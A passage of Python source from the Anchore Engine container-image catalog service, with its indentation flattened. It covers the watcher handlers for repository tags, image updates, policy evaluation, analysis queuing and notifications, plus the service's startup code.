subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
registry_creds = db_registries.get_byuserId(userId, session=dbsession)
try:
catalog_impl.refresh_registry_creds(registry_creds, dbsession)
except Exception as err:
logger.warn("failed to refresh registry credentials - exception: " + str(err))
for subscription_record in subscription_records:
if not subscription_record['active']:
continue
event = None
try:
regrepo = subscription_record['subscription_key']
if subscription_record['subscription_value']:
subscription_value = json.loads(subscription_record['subscription_value'])
if 'autosubscribe' not in subscription_value:
subscription_value['autosubscribe'] = False
if 'lookuptag' not in subscription_value:
subscription_value['lookuptag'] = 'latest'
else:
subscription_value = {'autosubscribe': False, 'lookuptag': 'latest'}
stored_repotags = subscription_value.get('repotags', [])
fulltag = regrepo + ":" + subscription_value.get('lookuptag', 'latest')
image_info = anchore_engine.common.images.get_image_info(userId, "docker", fulltag,
registry_lookup=False,
registry_creds=(None, None))
# List tags
try:
curr_repotags = docker_registry.get_repo_tags(userId, image_info, registry_creds=registry_creds)
except AnchoreException as e:
event = events.ListTagsFail(user_id=userId, registry=image_info.get('registry', None),
repository=image_info.get('repo', None), error=e.to_dict())
raise e
autosubscribes = ['analysis_update']
if subscription_value['autosubscribe']:
autosubscribes.append("tag_update")
repotags = set(curr_repotags).difference(set(stored_repotags))
if repotags:
logger.debug("new tags to watch in repo (" + str(regrepo) + "): " + str(repotags))
added_repotags = stored_repotags
for repotag in repotags:
try:
fulltag = image_info['registry'] + "/" + image_info['repo'] + ":" + repotag
logger.debug("found new tag in repo: " + str(fulltag))
new_image_info = anchore_engine.common.images.get_image_info(userId, "docker", fulltag,
registry_lookup=True,
registry_creds=registry_creds)
manifest = None
try:
if 'manifest' in new_image_info:
try:
manifest = json.dumps(new_image_info['manifest'])
except Exception as err:
raise TagManifestParseError(cause=err, tag=fulltag,
manifest=new_image_info['manifest'],
msg='Failed to serialize manifest into JSON formatted string')
else:
raise TagManifestNotFoundError(tag=fulltag, msg='No manifest from get_image_info')
except AnchoreException as e:
event = events.TagManifestParseFail(user_id=userId, tag=fulltag, error=e.to_dict())
raise
with db.session_scope() as dbsession:
logger.debug("adding/updating image from repo scan " + str(new_image_info['fulltag']))
# add the image
image_records = catalog_impl.add_or_update_image(dbsession, userId,
new_image_info['imageId'],
tags=[new_image_info['fulltag']],
digests=[new_image_info['fulldigest']],
parentdigest=new_image_info.get('parentdigest', None),
manifest=manifest)
# add the subscription records with the configured default activations
for stype in anchore_engine.common.subscription_types:
activate = False
if stype == 'repo_update':
continue
elif stype in autosubscribes:
activate = True
db_subscriptions.add(userId, new_image_info['fulltag'], stype, {'active': activate},
session=dbsession)
added_repotags.append(repotag)
except Exception as err:
logger.warn(
"could not add discovered tag from repo (" + str(fulltag) + ") - exception: " + str(
err))
# update the subscription record with the latest successfully added image tags
with db.session_scope() as dbsession:
subscription_value['repotags'] = added_repotags
subscription_value['tagcount'] = len(added_repotags)
db_subscriptions.update(userId, regrepo, 'repo_update',
{'subscription_value': json.dumps(subscription_value)},
session=dbsession)
else:
logger.debug("no new images in watched repo (" + str(regrepo) + "): skipping")
except Exception as err:
logger.warn("failed to process repo_update subscription - exception: " + str(err))
finally:
if event:
_add_event(event)
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return (True)
def handle_image_watcher(*args, **kwargs):
global system_user_auth
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
obj_mgr = object_store.get_manager()
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
for account in accounts:
userId = account['name']
if account['type'] == AccountTypes.service: # userId == 'anchore-system':
continue
with db.session_scope() as dbsession:
dbfilter = {}
dbfilter['subscription_type'] = 'tag_update'
subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
registry_creds = db_registries.get_byuserId(userId, session=dbsession)
try:
catalog_impl.refresh_registry_creds(registry_creds, dbsession)
except Exception as err:
logger.warn("failed to refresh registry credentials - exception: " + str(err))
alltags = []
for subscription_record in subscription_records:
if not subscription_record['active']:
continue
try:
fulltag = subscription_record['subscription_key']
if fulltag not in alltags:
alltags.append(fulltag)
except Exception as err:
logger.warn("problem creating taglist for image watcher - exception: " + str(err))
for registry_record in registry_creds:
try:
registry_status = docker_registry.ping_docker_registry(registry_record)
except Exception as err:
registry_record['record_state_key'] = 'auth_failure'
registry_record['record_state_val'] = str(int(time.time()))
logger.warn("registry ping failed - exception: " + str(err))
logger.debug("checking tags for update: " + str(userId) + " : " + str(alltags))
for fulltag in alltags:
event = None
try:
logger.debug("checking image latest info from registry: " + fulltag)
image_info = anchore_engine.common.images.get_image_info(userId, "docker", fulltag,
registry_lookup=True,
registry_creds=registry_creds)
logger.spew("checking image: got registry info: " + str(image_info))
manifest = None
try:
if 'manifest' in image_info:
try:
manifest = json.dumps(image_info['manifest'])
except Exception as err:
raise TagManifestParseError(cause=err, tag=fulltag, manifest=image_info['manifest'],
msg='Failed to serialize manifest into JSON formatted string')
else:
raise TagManifestNotFoundError(tag=fulltag, msg='No manifest from get_image_info')
except AnchoreException as e:
event = events.TagManifestParseFail(user_id=userId, tag=fulltag, error=e.to_dict())
raise
try:
dbfilter = {
'registry': image_info['registry'],
'repo': image_info['repo'],
'tag': image_info['tag'],
'digest': image_info['digest']
}
except Exception as err:
raise Exception("could not prepare db filter for complete lookup check - exception: " + str(err))
try:
stored_manifest = json.loads(obj_mgr.get_document(userId, 'manifest_data', image_info['digest']))
if not stored_manifest:
raise Exception("stored manifest is empty")
except Exception as err:
logger.debug("found empty/invalid stored manifest, storing new: " + str(err))
rc = obj_mgr.put_document(userId, 'manifest_data', image_info['digest'], manifest)
logger.debug("checking image: looking up image in db using dbfilter: " + str(dbfilter))
with db.session_scope() as dbsession:
record = db_catalog_image.get_byimagefilter(userId, 'docker', dbfilter, session=dbsession)
if record:
logger.debug("checking image: found match, no update, nothing to do: " + str(fulltag))
else:
logger.info(
"checking image: found latest digest for tag is not in DB: should update and queue for analysis: tag=" + str(
fulltag) + " latest_digest=" + str(dbfilter['digest']))
# get the set of existing digests
try:
last_dbfilter = {}
last_dbfilter.update(dbfilter)
last_dbfilter.pop('digest', None)
last_digests = []
last_annotations = {}
is_latest = True
with db.session_scope() as dbsession:
last_image_records = db_catalog_image.get_byimagefilter(userId, 'docker', last_dbfilter,
session=dbsession)
if last_image_records:
for last_image_record in last_image_records:
imageDigest = last_image_record['imageDigest']
for image_detail in last_image_record['image_detail']:
last_digests.append(image_detail['digest'])
# only do this (bring forward annotations) for the first found digest (last digest associated with tag)
if is_latest:
if not last_annotations and last_image_record['annotations']:
try:
if last_image_record.get('annotations', '{}'):
last_annotations.update(
json.loads(last_image_record.get('annotations', '{}')))
except:
pass
is_latest = False
except Exception as err:
logger.error(str(err))
# add and store the new image
with db.session_scope() as dbsession:
logger.debug("adding new image from tag watcher " + str(image_info))
image_records = catalog_impl.add_or_update_image(dbsession, userId, image_info['imageId'],
tags=[image_info['fulltag']],
digests=[image_info['fulldigest']],
parentdigest=image_info.get('parentdigest', None),
manifest=manifest,
annotations=last_annotations)
if image_records:
image_record = image_records[0]
else:
image_record = {}
logger.info("checking image: added new image: " + str(image_record))
new_digests = [image_info['digest']]
# construct the notification and queue
try:
npayload = {
'last_eval': last_digests,
'curr_eval': new_digests,
}
if last_annotations:
npayload['annotations'] = last_annotations
rc = notifications.queue_notification(userId, fulltag, 'tag_update', npayload)
logger.debug("queued image tag update notification: " + fulltag)
# inobj = {
# 'userId': userId,
# 'subscription_key':fulltag,
# 'notificationId': str(uuid.uuid4()),
# 'last_eval':last_digests,
# 'curr_eval':new_digests,
# }
# if not simplequeue.is_inqueue(system_user_auth, 'tag_update', inobj):
# qobj = simplequeue.enqueue(system_user_auth, 'tag_update', inobj)
# logger.debug("queued image tag update notification: " + fulltag)
except Exception as err:
logger.error("failed to queue tag update notification - exception: " + str(err))
raise err
except Exception as err:
logger.error("failed to check/update image - exception: " + str(err))
finally:
if event:
_add_event(event)
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return (True)
def _add_event(event, quiet=True):
try:
with db.session_scope() as dbsession:
db_events.add(event.to_dict(), dbsession)
logger.debug("queueing event creation notification")
npayload = {'event': event.to_dict()}
rc = notifications.queue_notification(event.user_id, subscription_key=event.level,
subscription_type='event_log', payload=npayload)
except:
if quiet:
logger.exception('Ignoring error creating/notifying event: {}'.format(event))
else:
raise
def check_feedmeta_update(dbsession):
global feed_sync_updated
return (feed_sync_updated)
def check_policybundle_update(userId, dbsession):
global bundle_user_last_updated
is_updated = True
try:
last_bundle_update = 0
active_policy_record = db_policybundle.get_active_policy(userId, session=dbsession)
if active_policy_record:
last_bundle_update = active_policy_record['last_updated']
else:
logger.warn("user has no active policy - queueing just in case" + str(userId))
return (is_updated)
if userId not in bundle_user_last_updated:
bundle_user_last_updated[userId] = last_bundle_update
if last_bundle_update == bundle_user_last_updated[userId]:
logger.debug("no bundle update detected since last cycle")
is_updated = False
else:
logger.debug("bundle update detected since last cycle")
bundle_user_last_updated[userId] = last_bundle_update
is_updated = True
except Exception as err:
logger.warn("failed to get/parse active policy bundle for user (" + str(userId) + ") - exception: " + str(err))
bundle_user_last_updated[userId] = 0
is_updated = True
return (is_updated)
def handle_policyeval(*args, **kwargs):
global system_user_auth, bundle_user_is_updated, feed_sync_updated
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
try:
all_ready = anchore_engine.clients.services.common.check_services_ready(['policy_engine', 'simplequeue'])
if not all_ready:
logger.debug("FIRING DONE: policy eval (skipping due to required services not being available)")
try:
kwargs['mythread']['last_return'] = False
except:
pass
return (True)
with db.session_scope() as dbsession:
feed_updated = check_feedmeta_update(dbsession)
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
for account in accounts:
userId = account['name']
# policy evaluations
doperform = False
policy_subs = []
for subscription_type in ['policy_eval']:
dbfilter = {'subscription_type': subscription_type}
with db.session_scope() as dbsession:
subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
for subscription_record in subscription_records:
if subscription_record['active']:
image_info = anchore_engine.common.images.get_image_info(userId, "docker", subscription_record[
'subscription_key'], registry_lookup=False, registry_creds=(None, None))
dbfilter = {'registry': image_info['registry'], 'repo': image_info['repo'],
'tag': image_info['tag']}
if (dbfilter, subscription_record['subscription_value']) not in policy_subs:
policy_subs.append((dbfilter, subscription_record['subscription_value']))
for (dbfilter, value) in policy_subs:
with db.session_scope() as dbsession:
image_records = db_catalog_image.get_byimagefilter(userId, 'docker', dbfilter=dbfilter,
onlylatest=False, session=dbsession)
if value:
try:
subscription_value = json.loads(value)
digests = set(subscription_value['digests'])
except Exception as err:
digests = set()
else:
digests = set()
# always add latest version of the image
if len(image_records) > 0:
digests.add(image_records[0]['imageDigest'])
for image_record in image_records:
if image_record['analysis_status'] == taskstate.complete_state('analyze'):
imageDigest = image_record['imageDigest']
if imageDigest not in digests:
continue
fulltag = dbfilter['registry'] + "/" + dbfilter['repo'] + ":" + dbfilter['tag']
# TODO - checks to avoid performing eval if nothing has changed
doperform = True
if doperform:
logger.debug("calling policy eval perform: " + str(fulltag) + " : " + str(imageDigest))
with db.session_scope() as dbsession:
try:
rc = catalog_impl.perform_policy_evaluation(userId, imageDigest, dbsession,
evaltag=fulltag)
except Exception as err:
logger.warn("policy evaluation failed - exception: " + str(err))
except Exception as err:
logger.warn("failure in policy eval / vuln scan handler - exception: " + str(err))
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return (True)
def handle_analyzer_queue(*args, **kwargs):
global system_user_auth
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
localconfig = anchore_engine.configuration.localconfig.get_config()
obj_mgr = object_store.get_manager()
try:
max_working_time = int(localconfig['image_analyze_timeout_seconds'])
except:
max_working_time = 36000
all_ready = anchore_engine.clients.services.common.check_services_ready(['policy_engine', 'simplequeue'])
if not all_ready:
logger.debug("FIRING DONE: analyzer queuer (skipping due to required services not being available)")
try:
kwargs['mythread']['last_return'] = False
except:
pass
return (True)
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(include_service=False)
q_client = internal_client_for(SimpleQueueClient, userId=None)
for account in accounts:
userId = account['name']
if account['type'] == AccountTypes.service: # userId == 'anchore-system':
continue
# do this in passes, for each analysis_status state
with db.session_scope() as dbsession:
dbfilter = {'analysis_status': taskstate.working_state('analyze')}
workingstate_image_records = db_catalog_image.get_byfilter(userId, session=dbsession, **dbfilter)
# first, evaluate images looking for those that have been in working state for too long and reset
for image_record in workingstate_image_records:
imageDigest = image_record['imageDigest']
if image_record['image_status'] == taskstate.complete_state('image_status'):
state_time = int(time.time()) - image_record['last_updated']
logger.debug("image in working state for (" + str(state_time) + ")s - " + str(imageDigest))
if state_time > max_working_time:
logger.warn("image has been in working state (" + str(
taskstate.working_state('analyze')) + ") for over (" + str(
max_working_time) + ") seconds - resetting and requeueing for analysis")
image_record['analysis_status'] = taskstate.reset_state('analyze')
with db.session_scope() as dbsession:
db_catalog_image.update_record(image_record, session=dbsession)
# next, look for any image in base state (not_analyzed) for queuing
with db.session_scope() as dbsession:
dbfilter = {'analysis_status': taskstate.base_state('analyze')}
# dbfilter = {}
basestate_image_records = db_catalog_image.get_byfilter(userId, session=dbsession, **dbfilter)
for basestate_image_record in basestate_image_records:
imageDigest = basestate_image_record['imageDigest']
image_record = basestate_image_record
# dbfilter = {'imageDigest': imageDigest}
# with db.session_scope() as dbsession:
# image_records = db.db_catalog_image.get_byfilter(userId, session=dbsession, **dbfilter)
# image_record = image_records[0]
if image_record['image_status'] == taskstate.complete_state('image_status'):
logger.debug("image check")
if image_record['analysis_status'] == taskstate.base_state('analyze'):
logger.debug("image in base state - " + str(imageDigest))
try:
manifest = obj_mgr.get_document(userId, 'manifest_data', image_record['imageDigest'])
except Exception as err:
logger.debug("failed to get manifest - {}".format(str(err)))
manifest = {}
qobj = {}
qobj['userId'] = userId
qobj['imageDigest'] = image_record['imageDigest']
qobj['manifest'] = manifest
try:
if not q_client.is_inqueue('images_to_analyze', qobj):
# queue image for analysis
logger.debug("queued image for analysis: " + str(imageDigest))
qobj = q_client.enqueue('images_to_analyze', qobj)
# set the appropriate analysis state for image
# image_record['analysis_status'] = taskstate.queued_state('analyze')
# image_record['analysis_status'] = taskstate.working_state('analyze')
# with db.session_scope() as dbsession:
# rc = db.db_catalog_image.update_record(image_record, session=dbsession)
else:
logger.debug("image already queued")
except Exception as err:
logger.error("failed to check/queue image for analysis - exception: " + str(err))
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return (True)
def handle_notifications(*args, **kwargs):
global system_user_auth
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
q_client = internal_client_for(SimpleQueueClient, userId=None)
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
localconfig = anchore_engine.configuration.localconfig.get_config()
try:
notification_timeout = int(localconfig['webhooks']['notification_retry_timeout'])
except:
notification_timeout = 30
logger.debug("notification timeout: " + str(notification_timeout))
# get the event log notification config
try:
event_log_config = localconfig.get('services', {}).get('catalog', {}).get('event_log', None)
if event_log_config and 'notification' in event_log_config:
notify_events = event_log_config.get('notification').get('enabled', False)
if notify_events and 'level' in event_log_config.get('notification'):
event_levels = event_log_config.get('notification').get('level')
event_levels = [level.lower() for level in event_levels]
else:
event_levels = None
else:
notify_events = False
event_levels = None
except:
logger.exception('Ignoring errors parsing for event_log configuration')
notify_events = False
event_levels = None
# regular event queue notifications + event log notification
event_log_type = 'event_log'
for subscription_type in anchore_engine.common.subscription_types + [event_log_type]:
logger.debug("notifier: " + subscription_type)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
try:
qlen = q_client.qlen(subscription_type)
except Exception as err:
logger.debug(
"problem looking for notifications in queue: " + str(subscription_type) + " - exception: " + str(
err))
qlen = 0
while (qlen > 0):
pupdate_record = q_client.dequeue(subscription_type)
if pupdate_record:
logger.debug("got notification from queue: " + json.dumps(pupdate_record, indent=4))
notification = pupdate_record['data']
userId = notification['userId']
subscription_key = notification['subscription_key']
notificationId = notification['notificationId']
for account in accounts:
try:
if userId == account['name']:
notification_record = None
if subscription_type in anchore_engine.common.subscription_types:
dbfilter = {'subscription_type': subscription_type,
'subscription_key': subscription_key}
subscription_records = db_subscriptions.get_byfilter(account['name'],
session=dbsession, **dbfilter)
if subscription_records:
subscription = subscription_records[0]
if subscription and subscription['active']:
notification_record = notifications.make_notification(account,
subscription_type,
notification)
elif subscription_type == event_log_type: # handle event_log differently since its not a type of subscriptions
if notify_events and (
event_levels is None or subscription_key.lower() in event_levels):
notification.pop('subscription_key',
None) # remove subscription_key property from notification
notification_record = notifications.make_notification(account, subscription_type,
notification)
if notification_record:
logger.spew("Storing NOTIFICATION: " + str(account) + str(notification_record))
db_queues.add(subscription_type, userId, notificationId, notification_record, 0,
int(time.time() + notification_timeout), session=dbsession)
except Exception as err:
import traceback
traceback.print_exc()
logger.warn("cannot store notification to DB - exception: " + str(err))
qlen = q_client.qlen(subscription_type)
for account in accounts:
notification_records = db_queues.get_all(subscription_type, account['name'], session=dbsession)
for notification_record in notification_records:
logger.debug("drained to send: " + json.dumps(notification_record))
try:
rc = notifications.notify(account, notification_record)
if rc:
db_queues.delete_record(notification_record, session=dbsession)
except Exception as err:
logger.debug("failed to send notification, storing for retry - exception: " + str(err))
notification_record['tries'] = int(time.time())
if notification_record['tries'] > notification_record['max_tries']:
logger.error("hit max notification timeout: dropping notificaion")
db_queues.delete_record(notification_record, session=dbsession)
else:
db_queues.update_record(notification_record, session=dbsession)
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return (True)
def handle_metrics(*args, **kwargs):
cycle_timer = kwargs['mythread']['cycle_timer']
while (True):
# perform some DB read/writes for metrics gathering
if anchore_engine.subsys.metrics.is_enabled():
# DB probes
anchore_record = None
try:
with anchore_engine.subsys.metrics.get_summary_obj("anchore_db_read_seconds").time() as mtimer:
with db.session_scope() as dbsession:
anchore_record = db_anchore.get(session=dbsession)
except Exception as err:
logger.warn("unable to perform DB read probe - exception: " + str(err))
if anchore_record:
try:
with anchore_engine.subsys.metrics.get_summary_obj("anchore_db_write_seconds").time() as mtimer:
with db.session_scope() as dbsession:
anchore_record['record_state_val'] = str(time.time())
rc = db_anchore.update_record(anchore_record, session=dbsession)
except Exception as err:
logger.warn("unable to perform DB write probe - exception: " + str(err))
try:
with anchore_engine.subsys.metrics.get_summary_obj("anchore_db_readwrite_seconds").time() as mtimer:
with db.session_scope() as dbsession:
anchore_record = db_anchore.get(session=dbsession)
anchore_record['record_state_val'] = str(time.time())
rc = db_anchore.update_record(anchore_record, session=dbsession)
except Exception as err:
logger.warn("unable to perform DB read/write probe - exception: " + str(err))
# FS probes
localconfig = anchore_engine.configuration.localconfig.get_config()
try:
tmpdir = localconfig['tmp_dir']
svfs = os.statvfs(tmpdir)
available_bytes = svfs.f_bsize * svfs.f_bavail
anchore_engine.subsys.metrics.gauge_set("anchore_tmpspace_available_bytes", available_bytes)
except Exception as err:
logger.warn("unable to detect available bytes probe - exception: " + str(err))
time.sleep(cycle_timer)
def handle_archive_tasks(*args, **kwargs):
"""
Handles periodic scan tasks for archive rule processing
:param args:
:param kwargs:
:return:
"""
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
start_time = time.time()
logger.debug("FIRING: " + str(watcher))
task_id = None
try:
logger.info('Starting analysis archive transition rule processor')
with db.session_scope() as session:
# Get accounts that have rules
accounts = session.query(ArchiveTransitionRule.account).distinct(ArchiveTransitionRule.account).all()
if accounts:
accounts = [x[0] for x in accounts]
logger.debug('Found accounts {} with transition rules'.format(accounts))
for account in accounts:
task = archiver.ArchiveTransitionTask(account)
task_id = task.task_id
logger.info('Starting archive transition task {} for account {}'.format(task.task_id, account))
task.run()
logger.info('Archive transition task {} complete'.format(task.task_id))
except Exception as ex:
logger.exception('Caught unexpected exception')
finally:
logger.debug('Analysis archive task {} execution time: {} seconds'.format(task_id, time.time() - start_time))
logger.debug('Sleeping until next cycle since no messages to process')
return True
click = 0
running = False
last_run = 0
system_user_auth = ('anchore-system', '')
# policy update check data
feed_sync_updated = False
bundle_user_last_updated = {}
bundle_user_is_updated = {}
default_lease_ttl = 60 # 1 hour ttl, should be more than enough in most cases
def watcher_func(*args, **kwargs):
global system_user_auth
while (True):
logger.debug("starting generic watcher")
all_ready = anchore_engine.clients.services.common.check_services_ready(['simplequeue'])
if not all_ready:
logger.info("simplequeue service not yet ready, will retry")
else:
q_client = internal_client_for(SimpleQueueClient, userId=None)
lease_id = None
try:
logger.debug("attempting dequeue")
qobj = q_client.dequeue('watcher_tasks', max_wait_seconds=30)
logger.debug("dequeue complete")
if qobj:
logger.debug("got task from queue: " + str(qobj))
watcher = qobj['data']['watcher']
handler = watchers[watcher]['handler']
args = []
kwargs = {'mythread': watchers[watcher]}
lease_id = watchers[watcher]['task_lease_id']
# Old way
timer = time.time()
if not lease_id:
logger.debug(
'No task lease defined for watcher {}, initiating without lock protection'.format(watcher))
rc = handler(*args, **kwargs)
else:
rc = simplequeue.run_target_with_lease(system_user_auth, lease_id, handler,
ttl=default_lease_ttl, *args, **kwargs)
else:
logger.debug("nothing in queue")
except (simplequeue.LeaseAcquisitionFailedError, simplequeue.LeaseUnavailableError) as e:
logger.debug('Lease acquisition could not complete, but this is probably due to another process with the lease: {}'.format(e))
except Exception as err:
logger.warn("failed to process task this cycle: " + str(err))
logger.debug("generic watcher done")
time.sleep(5)
def schedule_watcher(watcher):
global watchers, watcher_task_template, system_user_auth
if watcher not in watchers:
logger.warn("input watcher {} not in list of available watchers {}".format(watcher, list(watchers.keys())))
return (False)
if watchers[watcher]['taskType']:
logger.debug("should queue job: " + watcher)
watcher_task = copy.deepcopy(watcher_task_template)
watcher_task['watcher'] = watcher
watcher_task['taskType'] = watchers[watcher]['taskType']
try:
q_client = internal_client_for(SimpleQueueClient, userId=None)
if not q_client.is_inqueue('watcher_tasks', watcher_task):
qobj = q_client.enqueue('watcher_tasks', watcher_task)
logger.debug(str(watcher_task) + ": init task queued: " + str(qobj))
else:
logger.debug(str(watcher_task) + ": init task already queued")
watchers[watcher]['last_queued'] = time.time()
except Exception as err:
logger.warn("failed to enqueue watcher task: " + str(err))
return (True)
def monitor_func(**kwargs):
global click, running, last_queued, system_user_auth, watchers, last_run
if click < 5:
click = click + 1
logger.debug("Catalog monitor starting in: " + str(5 - click))
return (True)
if running or ((time.time() - last_run) < kwargs['kick_timer']):
return (True)
logger.debug("FIRING: catalog_monitor")
try:
localconfig = anchore_engine.configuration.localconfig.get_config()
system_user_auth = localconfig['system_user_auth']
for watcher in list(watchers.keys()):
if not watchers[watcher]['initialized']:
# first time
if 'cycle_timers' in kwargs and watcher in kwargs['cycle_timers']:
try:
the_cycle_timer = watchers[watcher]['cycle_timer']
min_cycle_timer = watchers[watcher]['min_cycle_timer']
max_cycle_timer = watchers[watcher]['max_cycle_timer']
config_cycle_timer = int(kwargs['cycle_timers'][watcher])
if config_cycle_timer < 0:
the_cycle_timer = abs(int(config_cycle_timer))
elif config_cycle_timer < min_cycle_timer:
logger.warn("configured cycle timer for handler (" + str(
watcher) + ") is less than the allowed min (" + str(
min_cycle_timer) + ") - using allowed min")
the_cycle_timer = min_cycle_timer
elif config_cycle_timer > max_cycle_timer:
logger.warn("configured cycle timer for handler (" + str(
watcher) + ") is greater than the allowed max (" + str(
max_cycle_timer) + ") - using allowed max")
the_cycle_timer = max_cycle_timer
else:
the_cycle_timer = config_cycle_timer
watchers[watcher]['cycle_timer'] = the_cycle_timer
except Exception as err:
logger.warn(
"exception setting custom cycle timer for handler (" + str(watcher) + ") - using default")
watchers[watcher]['initialized'] = True
if watcher not in watcher_threads:
if watchers[watcher]['taskType']:
# spin up a generic task watcher
logger.debug("starting generic task thread")
watcher_threads[watcher] = threading.Thread(target=watcher_func, args=[watcher], kwargs={})
watcher_threads[watcher].start()
else:
# spin up a specific looping watcher thread
watcher_threads[watcher] = threading.Thread(target=watchers[watcher]['handler'],
args=watchers[watcher]['args'],
kwargs={'mythread': watchers[watcher]})
watcher_threads[watcher].start()
all_ready = anchore_engine.clients.services.common.check_services_ready(['simplequeue'])
if not all_ready:
logger.info("simplequeue service not yet ready, will retry")
elif time.time() - watchers[watcher]['last_queued'] > watchers[watcher]['cycle_timer']:
rc = schedule_watcher(watcher)
except Exception as err:
logger.error(str(err))
finally:
logger.debug("FIRING DONE: catalog_monitor")
running = False
last_run = time.time()
logger.debug("exiting monitor thread")
monitor_thread = None
def monitor(*args, **kwargs):
global monitor_thread
try:
donew = False
if monitor_thread:
if monitor_thread.isAlive():
logger.spew("MON: thread still running")
else:
logger.spew("MON: thread stopped running")
donew = True
monitor_thread.join()
logger.spew("MON: thread joined: isAlive=" + str(monitor_thread.isAlive()))
else:
logger.spew("MON: no thread")
donew = True
if donew:
logger.spew("MON: starting")
monitor_thread = threading.Thread(target=monitor_func, kwargs=kwargs)
monitor_thread.start()
else:
logger.spew("MON: skipping")
except Exception as err:
logger.warn("MON thread start exception: " + str(err))
class CatalogService(ApiService):
__service_name__ = 'catalog'
__spec_dir__ = pkg_resources.resource_filename(__name__, 'swagger')
__monitor_fn__ = monitor
def _register_instance_handlers(self):
super()._register_instance_handlers()
self.register_handler(LifeCycleStages.post_db, self._init_object_storage, {})
self.register_handler(LifeCycleStages.post_register, self._init_policies, {})
def _init_object_storage(self):
try:
did_init = object_store.initialize(self.configuration, manager_id=DEFAULT_OBJECT_STORE_MANAGER_ID, config_keys=[DEFAULT_OBJECT_STORE_MANAGER_ID, ALT_OBJECT_STORE_CONFIG_KEY], allow_legacy_fallback=True)
if not did_init:
logger.warn('Unexpectedly found the object store already initialized. This is not an expected condition. Continuting with driver: {}'.format(object_store.get_manager().primary_client.__config_name__))
except Exception as err:
logger.exception("Error initializing the object store: check catalog configuration")
raise err
try:
archive.initialize(self.configuration)
except Exception as err:
logger.exception("Error initializing analysis archive: check catalog configuration")
raise err
def _init_policies(self):
"""
Ensure all accounts have a default policy in place
:return:
"""
obj_mgr = object_store.get_manager()
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
for account_dict in mgr.list_accounts(include_service=False):
try:
logger.info('Initializing a new account')
userId = account_dict['name'] # Old keys are userId, now that maps to account name
bundle_records = db_policybundle.get_all_byuserId(userId, session=dbsession)
if not bundle_records:
logger.debug("Account {} has no policy bundle - installing default".format(userId))
config = self.global_configuration
if config.get('default_bundle_file', None) and os.path.exists(config['default_bundle_file']):
logger.info("loading def bundle: " + str(config['default_bundle_file']))
try:
default_bundle = {}
with open(config['default_bundle_file'], 'r') as FH:
default_bundle = json.loads(FH.read())
if default_bundle:
bundle_url = obj_mgr.put_document(userId, 'policy_bundles', default_bundle['id'],
default_bundle)
policy_record = make_policy_record(userId, default_bundle, active=True)
rc = db_policybundle.add(policy_record['policyId'], userId, True, policy_record,
session=dbsession)
if not rc:
raise Exception("policy bundle DB add failed")
except Exception as err:
if isinstance(err, IntegrityError):
logger.warn("another process has already initialized, continuing")
else:
logger.error("could not load up default bundle for user - exception: " + str(err))
except Exception as err:
if isinstance(err, IntegrityError):
logger.warn("another process has already initialized, continuing")
else:
raise Exception("unable to initialize default user data - exception: " + str(err))
watchers = {
'image_watcher': {'handler': handle_image_watcher, 'task_lease_id': 'image_watcher',
'taskType': 'handle_image_watcher', 'args': [], 'cycle_timer': 600, 'min_cycle_timer': 300,
'max_cycle_timer': 86400 * 7, 'last_queued': 0, 'last_return': False, 'initialized': False},
'repo_watcher': {'handler': handle_repo_watcher, 'task_lease_id': 'repo_watcher', 'taskType': 'handle_repo_watcher',
'args': [], 'cycle_timer': 60, 'min_cycle_timer': 60, 'max_cycle_timer': 86400 * 7,
